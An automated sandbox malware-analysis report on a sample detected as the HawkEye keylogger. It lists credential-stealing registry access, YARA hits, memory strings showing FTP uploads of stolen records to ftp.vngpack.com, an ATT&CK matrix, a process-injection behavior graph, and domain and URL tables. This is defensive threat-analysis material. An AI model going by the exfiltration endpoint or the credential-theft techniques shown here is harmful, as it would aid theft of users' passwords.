            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Tries to steal Mail credentials (via file registry)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
            Yara detected WebBrowserPassView password recovery toolShow sources
            Source: Yara matchFile source: 12.2.InstallUtil.exe.3b39930.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a36f7.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.409c0d.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.3b51b50.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439c2d7.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.3b51b50.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5560, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY

            Remote Access Functionality:

            barindex
            Detected HawkEye RatShow sources
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Source: InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
            Source: InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpString found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
            Source: InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpString found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: lBHawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: lXftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_841618%207.27.2021%2011:21:35%20AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmpString found in binary or memory: l^ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_841618%207.27.2021%2011:21:35%20AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602895043.0000000002BFF000.00000004.00000001.sdmpString found in binary or memory: lBHawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txtP
            Source: InstallUtil.exe, 0000000C.00000002.602895043.0000000002BFF000.00000004.00000001.sdmpString found in binary or memory: lISTOR HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602895043.0000000002BFF000.00000004.00000001.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1Windows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Alternative Protocol1Encrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Replication Through Removable Media1Native API11Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11Input Capture1Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsShared Modules1Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information31Credentials in Registry2Account Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Process Injection312Software Packing11Credentials In Files1File and Directory Discovery1Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSystem Information Discovery18SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSecurity Software Discovery31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemVirtualization/Sandbox Evasion21Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowProcess Discovery4Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories2Network SniffingApplication Window Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
            Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 454641 Sample: ypBoHI5G3x Startdate: 27/07/2021 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 10 other signatures 2->47 7 ypBoHI5G3x.exe 15 4 2->7         started        process3 dnsIp4 25 www.google.com 142.250.185.196, 443, 49723 GOOGLEUS United States 7->25 21 C:\Users\user\AppData\...\InstallUtil.exe, PE32 7->21 dropped 23 C:\Users\user\AppData\...\ypBoHI5G3x.exe.log, ASCII 7->23 dropped 49 Writes to foreign memory regions 7->49 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->51 53 Injects a PE file into a foreign processes 7->53 12 InstallUtil.exe 14 4 7->12         started        file5 signatures6 process7 dnsIp8 27 ftp.vngpack.com 45.141.152.18, 21, 49759, 49760 M247GB Romania 12->27 29 192.168.2.1 unknown unknown 12->29 31 146.215.12.0.in-addr.arpa 12->31 55 Changes the view of files in windows explorer (hidden files and folders) 12->55 57 Sample uses process hollowing technique 12->57 16 vbc.exe 13 12->16         started        19 vbc.exe 1 12->19         started        signatures9 process10 signatures11 33 Tries to steal Mail credentials (via file registry) 16->33 35 Tries to harvest and steal browser information (history, passwords, etc) 16->35 37 Tries to steal Instant Messenger accounts or passwords 19->37 39 Tries to steal Mail credentials (via file access) 19->39

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ypBoHI5G3x.exe29%VirustotalBrowse
            ypBoHI5G3x.exe33%ReversingLabsByteCode-MSIL.Trojan.Phonzy
            ypBoHI5G3x.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\InstallUtil.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\InstallUtil.exe0%ReversingLabs

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.ypBoHI5G3x.exe.43944ca.8.unpack100%AviraTR/Inject.vcoldiDownload File
            12.2.InstallUtil.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
            12.2.InstallUtil.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
            1.2.ypBoHI5G3x.exe.419b8ea.4.unpack100%AviraTR/Inject.vcoldiDownload File
            18.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.monotype.S0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.carterandcone.comva0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Verdk0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.fontbureau.comFD0%Avira URL Cloudsafe
            http://ns.adobe.c/g0%URL Reputationsafe
            http://www.fontbureau.comessed0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.carterandcone.comro0%Avira URL Cloudsafe
            http://www.fontbureau.coml10%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://ftp.vngpack.com0%Avira URL Cloudsafe
            http://www.founder.com.cn/cno0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/60%URL Reputationsafe
            http://www.carterandcone.comue0%URL Reputationsafe
            http://www.carterandcone.com-sM0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
            http://www.fontbureau.comay0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/cs-c0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/wvR0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/settR0%Avira URL Cloudsafe
            http://www.fontbureau.comgrito0%URL Reputationsafe
            http://www.founder.com.cn/cntra:0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.carterandcone.como.0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://ns.adobe.c/g%%N0%Avira URL Cloudsafe
            http://www.fontbureau.comF0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/R0%URL Reputationsafe
            http://www.founder.com.cn/cnomp$0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/wuR0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cnm0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/D0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.com.F0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.comdR0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnhic0%Avira URL Cloudsafe
            http://www.carterandcone.comw0%Avira URL Cloudsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fontbureau.como0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/adnl0%URL Reputationsafe
            http://www.carterandcone.comou0%Avira URL Cloudsafe
            http://www.fontbureau.comitu0%URL Reputationsafe
            http://www.fontbureau.comu0%Avira URL Cloudsafe
            http://www.fontbureau.comm(0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/c0%URL Reputationsafe
            http://ns.ado/10%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.google.com
            		142.250.185.196
            		truefalse
              		high
              ftp.vngpack.com
              		45.141.152.18
              		truetrue
                		unknown
                146.215.12.0.in-addr.arpa
                		unknown
                		unknownfalse
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                    		high
                    http://www.monotype.SInstallUtil.exe, 0000000C.00000003.468375972.0000000005D70000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers/?InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                        		high
                        http://www.carterandcone.comvaInstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/VerdkInstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.tiro.comInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comFDInstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ns.adobe.c/gypBoHI5G3x.exe, 00000001.00000003.347743311.000000000736F000.00000004.00000001.sdmp, ypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comessedInstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.goodfont.co.krInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comInstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comroInstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schema.org/WebPageypBoHI5G3x.exe, 00000001.00000002.448077774.0000000003167000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.coml1InstallUtil.exe, 0000000C.00000003.470360983.0000000005D4A000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ftp.vngpack.comInstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.founder.com.cn/cnoInstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.comypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/6InstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comueInstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.com-sMInstallUtil.exe, 0000000C.00000003.455586589.0000000005D46000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp//InstallUtil.exe, 0000000C.00000003.456469435.0000000005D49000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comayInstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/cs-cInstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/wvRInstallUtil.exe, 0000000C.00000003.457780221.0000000005D49000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://whatismyipaddress.com/-ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmpfalse
                                		high
                                http://www.galapagosdesign.com/DPleaseInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/settRInstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comgritoInstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://login.yahoo.com/config/loginvbc.exefalse
                                  		high
                                  http://www.fonts.comInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cntra:InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sandoll.co.krInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.site.com/logs.phpInstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.urwpp.deDPleaseInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.nirsoft.net/vbc.exe, vbc.exe, 00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmpfalse
                                        		high
                                        http://www.zhongyicts.com.cnInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.455377795.0000000005D47000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.carterandcone.como.InstallUtil.exe, 0000000C.00000003.455801076.0000000005D48000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ns.adobe.c/g%%NypBoHI5G3x.exe, 00000001.00000003.446695266.0000000007376000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://2542116.fls.doubleclick.net/activivbc.exe, 00000012.00000003.493497095.00000000022DC000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comInstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comFInstallUtil.exe, 0000000C.00000003.461734038.0000000005D4B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/RInstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cnomp$InstallUtil.exe, 0000000C.00000003.454846783.0000000005D46000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/wuRInstallUtil.exe, 0000000C.00000003.457320751.0000000005D49000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnmInstallUtil.exe, 0000000C.00000003.455377795.0000000005D47000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/GInstallUtil.exe, 0000000C.00000003.456469435.0000000005D49000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/DInstallUtil.exe, 0000000C.00000003.456756762.0000000005D4A000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
